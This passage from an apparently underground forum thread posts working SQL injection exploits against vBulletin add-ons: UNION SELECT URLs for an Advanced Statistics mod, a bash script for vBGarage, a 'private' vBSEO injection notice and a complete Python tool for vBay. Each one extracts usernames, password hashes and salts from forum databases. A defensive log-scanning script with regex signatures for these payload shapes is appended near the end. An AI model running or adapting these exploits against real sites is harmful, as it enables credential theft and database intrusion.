    http://hoiquantinhoc.com/modifications-3-8-x/4468-changuondyu-advanced-statistics-6-0-1-a.html
    # Version: vBulletin 3 & 4
    # Tested on: Windows 7
    #
    Vulnerability:

    SQL Injection was found in ChangUonDyU Advanced Statistics.

    Query on ajax.php

    Exploitation:

    Code:
    ajax.php?do=inforum&listforumid=100) UNION SELECT
    1,concat_ws(0x7c,user(),database(),version()),3,4,5,6,7,8,9,10-- -&result=20
    or:

    Code:
    ajax.php?do=inforum&listforumid=100) UNION SELECT
    1,2,3,4,5,6,concat_ws(0x7c,username,password,salt),8,9,10,11 from user
    where userid=1-- -&result=20
    Ex:

    Code:
    http://server/f/ajax.php?do=inforum&listforumid=100%29%20UNION%20SELECT%201,concat_ws%280x7c,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10--%20-&result=20
    (c) exploit-db.com

    Added 13 minutes later
    vBGarage Pro vBulletin Mod - SQL Injection


    Code:
    #!/bin/bash
    ##############
    # MegaManSec #
    ##############
    ##############
    #  InterNot  #
    ##############
    echo "MegaManSec @ www.internot.info"
    echo "White-Hat Hacker  "
    if [ -z "$1" ]; then
    	echo "Usage: $0 http://link.to/forum/"
    	echo "Example: $0 http://f800riders.org/forum/"
    	exit 1
    fi
    	tmpfile="/tmp/vbg.tmp"
    	echo "securitytoken=guest&s=&searchuser=&search_year=1&model_year=') IN (select (1) from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where usergroupid LIKE '%6%' LIMIT 1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''=''#&make_id=&model_id=&trim_id=&club_id=&category_id=&engine_type=&veh_class=&manufact_id=&product_id=&search_logic=any&do=search_results&submit=%3ESearch" > "$tmpfile"
    
    	sqldata=`curl -s -X POST -d @"$tmpfile" "$1"garage.php?do=search | grep -i 'MYSQL Error'| awk -F "Duplicate entry" '{print $2}' | awk -F "for key" '{print $1}'| w3m -dump -T text/html`
    if [ -z "$sqldata" ]; then
    	echo "Either not vulnerable, or is not showing the hash+pwd, try manually if you don't believe"
    	exit 1
    fi
    echo "Here is username:hash:salt"
    echo "$sqldata"
    rm "$tmpfile"
    exit 0
     
    Last edited: 5 Nov 2012
    5 Nov 2012
  18. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    246
    vBulletin vBSEO SQL Injection Vulnerability

    Code:
    ######################################################
    # vBulletin vBSEO SQL Injection Vulnerability (PRIVATE) 4/12/2012
    # Remember leaking means instant ban and dox. ^^
    ######################################################
    #
    # Security risk:   Very High
    #
    # Effective on:    All versions
    #
    # Exploit:         http://[target]/members/x.html?userid=[sql]
    #
    # Software link:   http://vbseo.com/
    #
    #######################################################
    #
    # Found by:        iV3cT0r
    #
    # Vendor notified: No
    #
    #######################################################
    #
    # Plugin patch---
    # PHP Code:        $vbulletin->db->query_write(rtrim($_GET['userid']));
    # Execution order: 5
    # Hook location:   global_start
    #
    ######################################################
     
    12 Nov 2012
    1 person likes this.
  19. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    246
    vBulletin vBay <=1.1.9 Error-Based SQL Injection


    Code:
    #!/usr/bin/env python -W ignore::DeprecationWarning
      
    """
      
       VBay <= 1.1.9 - Remote Error based SQL Injection
        
                            ~ Author:  Dan UK
                            ~ Contact: http://www.hackforums.net/member.php?action=profile&uid=817599
                            ~ Date:    10/11/12
              
               DETAILS
               Among a couple of other unsanitized parameters used within an INSERT INTO statement
               on line 424-460 of /upload/vbay.php, the "type" variable can be used to exploit this
               using error based sql injection, making it possible to grab anything the user wants
               from the vbulletin database (and any others if accessible).
        
               As said above, the affected file is /upload/vbay.php.
               On line 418, we can see the $vbulletin->input variable "type"
               being assigned with the datatype NO_HTML. Using this data type
               allows malicious attacks to still be executed.
        
               At line 448, it is used within the insert into statement,
               without any sanitization.
        
              
               POC
               - You will need to register an account.
               - Go to [site]/vbay.php?do=postauction.
               - Modify your post data using a tool such as live http headers, or setting it directly
                 using a tool such as curl/wget to grab the source.
               - Set the value of "type=" to something that will cause an error, such as a single tick.
                 Example: POST type='
               - If, when you view the source, you get a vbulletin error message surrounded within
                 comments, then it's possible to go ahead. If not, blind is the way forward.
        
               If error based is possible for you, you could either just simply look at some tutorials
               and go from there, or run the script below which will grab the details for the user specified.
        
               Have fun.
      
    """
      
    from optparse import OptionParser, OptionGroup
    from argparse import OPTIONAL
    import cookielib, urllib, urllib2, httplib
    import sys, md5, urlparse, re
      
    """
    OPTION PARSER/USAGE
    """
    usage = "./%prog [options]\n"
    usage += "-h or --help for more help."
      
    # Required options
    parser = OptionParser(usage=usage)
    parser.add_option("-u", dest="username",
                      help="Working username to the target forum.")
    parser.add_option("-p", dest="password",
                      help="Working password to the target forum.")
    parser.add_option("--host", dest="forumpath",
                      help="FULL path to the vbulletin forum.")
      
    # Optional Options
    optional = OptionGroup(parser, "Optional arguments")
    optional.add_option("-f", dest="userid",
                        help="User ID to grab. Default is 1.", metavar="USERID",
                        default="1")
    optional.add_option("-s", dest="prefix",
                        help="Set the prefix of the vBulletin forum\
                             Default is null.", default="")
    optional.add_option("-g", "--grab-prefix", dest="grabprefix",
                        help="Grab the tables prefix.", default=False,
                        action="store_true")
      
    parser.add_option_group(optional)
      
    (options, args) = parser.parse_args()
      
    if not options.forumpath:
        parser.error('[-] No forum path given.')
    if not options.username:
        parser.error('[-] No username given.')
    if not options.password:
        parser.error('[-] No password given.')
      
      
    """
    HEADER
    """
    def Header():
        header = """
    # # # # # # # # # # # # # # # # # #
    # VBay <=1.1.9 SQL Injection 0day #
    #            By Dan_UK            #
    # # # # # # # # # # # # # # # # # #\n"""
        return header
      
    """
    LOGIN AND EXTRACT NEEDED COOKIES
    """
    def loginForum(forum, username, password):
        md5pass = md5.md5(password).hexdigest()
        postdata = urllib.urlencode({
                    'do':'login',
                    'vb_login_md5password':md5pass,
                    'vb_login_username':username,
                    'cookieuser':'1'
                   })
        cookie_jar = cookielib.CookieJar()
        handeler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
        handeler.open(forum + "login.php?do=login", postdata)
        
        for cookie in cookie_jar:
            if "bbsessionhash" in str(cookie):
                return cookie_jar
      
      
    """
    CHECK VBAY EXISTS
    """
    def get_server_status_code(forum):
        host, path = urlparse.urlparse(forum)[1:3]
        try:
            conn = httplib.HTTPConnection(host)
            conn.request('HEAD', path)
            return conn.getresponse().status
        except StandardError:
            return None
      
    def checkExists(forum):
        good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY]
        return get_server_status_code(forum + "vbay.php") in good_codes
      
    """
    CHECK DEBUG MODE ENABLED
    """
    def checkVuln(forum, cookie_jar):
        payload = {
                   "POST":
                          urllib.urlencode({"type":"'"}),
                   "SCRIPT":"vbay.php?do=postauction"
                  }
        try:
            handeler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
            resp = handeler.open(forum + payload["SCRIPT"], payload["POST"])
        except urllib2.HTTPError as e:
            e_mesg = e.read()
            
        if "MySQL Error" in e_mesg:
            return True
      
    """
    GRAB PREFIX
    """
    def grabPrefix(forum, cookie_jar):
        payload = {
                   "SQL":urllib.urlencode({"type":"'"}),
                   "SCRIPT":"vbay.php?do=postauction"
                  }
        
        try:
            handler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
            resp = handler.open(forum + payload["SCRIPT"], payload["SQL"])
        except urllib2.HTTPError as e:
            e_mesg = e.read()
        
        prefix = re.search('INTO(.*)vbay_items', e_mesg).group(1)
        return prefix
            
        
      
    """
    GRAB INFO
    """
    def grabInfo(forum, cookie_jar, prefix, userid):
        # 0x2564656c696d312125 = "%delim1!%"
        payload = {
                    "SQL":
                          urllib.urlencode({
                           "type":"' and (select 1 from (select count(*),concat((select(select concat(cast(concat(0x2564656c696d312125,COL_NAME,0x2564656c696d312125) as char),0x7e)) from " + str(prefix) + "user WHERE userid=" + str(userid) + " limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or ''='",
                          }),
                   "COLS": ["username", "password", "salt"],
                   "SCRIPT":"vbay.php?do=postauction"
                  }
        
        info = []
        for col in payload["COLS"]:
            print "[!] Grabbing the %s" % col
            try:
                handler = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
                resp = handler.open(forum + payload["SCRIPT"], payload["SQL"].replace("COL_NAME", col))
            except urllib2.HTTPError as e:
                e_mesg = e.read()
                info.append(e_mesg.split("%delim1!%")[1].strip("\n"))
        return info
        
        
    """
    MAIN
    """
    def main():
         username = options.username
         password = options.password
         forum = options.forumpath
         userid = options.userid
         prefix = options.prefix
          
         if forum.lower()[:7] != "http://":
             if forum.lower()[:8] == "https://":
                 forum = forum.replace("https://", "http://")
         if forum[-1:] != "/":
             forum = forum + "/"
                  
         print Header()
          
         print "[!] Trying to login to: " + forum
         if loginForum(forum, username, password):
             cookies = loginForum(forum, username, password)
             print "[+] Login works."
         else:
             print "[-] Login doesn't work. (" + username + ":" + password + ")"
             print "[-] Exiting."
             sys.exit()
              
         print "\n[!] Checking if vBay is installed.."
         if (checkExists(forum)):
             print "[+] vBay was found. Continuing with exploit."
         else:
             print "[-] vBay could no be found. (" + forum + "/vbay.php)"
             print "[-] Exiting."
             sys.exit()
              
         print "\n[!] Checking if debug mode is enabled.."
         if checkVuln(forum, cookies):
             print "[+] Debug mode is enabled, exploit is possible."
              
         if options.grabprefix == True:
             print "\n[!] Grabbing prefix."
             print "[+] Prefix found:" + grabPrefix(forum, cookies)   
             sys.exit()
              
              
         print "\n[!] Grabbing info.\n"
         info = grabInfo(forum, cookies, prefix, userid)
         print "\n[+] Formatting for ease of view."
         print "\n\n[+] Username: " + info[0]
         print "[+] Password: " + info[1]
         print "[+] Salt: " + info[2]
         print "\n\nThanks for using my tool."
              
          
    if __name__ == "__main__":
        main()
    
     
    13 Nov 2012
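
For defenders: the GET-based payloads quoted in this thread share a few recognisable shapes (the `floor(rand())` ... `group by` duplicate-key trick, `UNION SELECT`, reads of `password` and `salt`). The script below is an added example, not part of any post or advisory above; it flags those shapes in web-server access logs, and the signature names, log lines, IPs and paths in it are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the payload shapes quoted in this thread (matched on normalised text).
# The names are labels chosen for this example.
SIGNATURES = {
    "error_based_dup_key": re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "credential_columns": re.compile(r"\bpassword\b.*\bsalt\b"),
    "subquery_in_param": re.compile(r"\(\s*select\b"),
}

# Apache/nginx "combined" log format: only the fields needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def normalise(raw):
    """Undo up to three layers of percent-encoding, drop /**/ comments, fold case and whitespace."""
    text = raw
    for _ in range(3):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def classify(line):
    """Return (ip, path, sorted signature names), or None if the line is clean or unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    text = normalise(query)
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(text))
    return (m.group("ip"), path, hits) if hits else None

def scan(lines):
    """Classify every line and keep only the ones that matched a signature."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up paths and sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2012:10:00:01 +0000] "GET /forum/ajax.php?do=getgroup&groupis='
    '(select%201%20and%20row(1,1)%3E(select%20count(*),concat(CHAR(52),floor(rand()*2))x%20from%20'
    '(select%201%20union%20select%202)a%20group%20by%20x%20limit%201)) HTTP/1.1" 200 512',
    '198.51.100.23 - - [19/Oct/2012:08:14:55 +0000] "GET /f/ajax.php?do=inforum&listforumid='
    '100%2529%2520UNION%2520SELECT%25201,concat_ws(0x7c,username,password,salt),3'
    '%2520from%2520user--%2520-&result=20 HTTP/1.1" 200 1043',
    '192.0.2.10 - - [19/Oct/2012:08:15:02 +0000] "GET /forum/showthread.php?t=232684&page=2 HTTP/1.1" 200 20480',
    '192.0.2.11 - - [19/Oct/2012:08:15:09 +0000] "GET /forum/search.php?do=process'
    '&query=how+to+select+a+password HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, ", ".join(hits))
```

Access logs record only the request line, so the POST-body injections in this thread (the awards, vBGarage and vBay posts) do not appear there; catching those needs request-body logging or a WAF rule that applies the same normalisation.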
  20. Хулиган
    Хулиган Forum staff Advanced
    Likes:
    246
    29 Nov 2012
    1 person likes this.
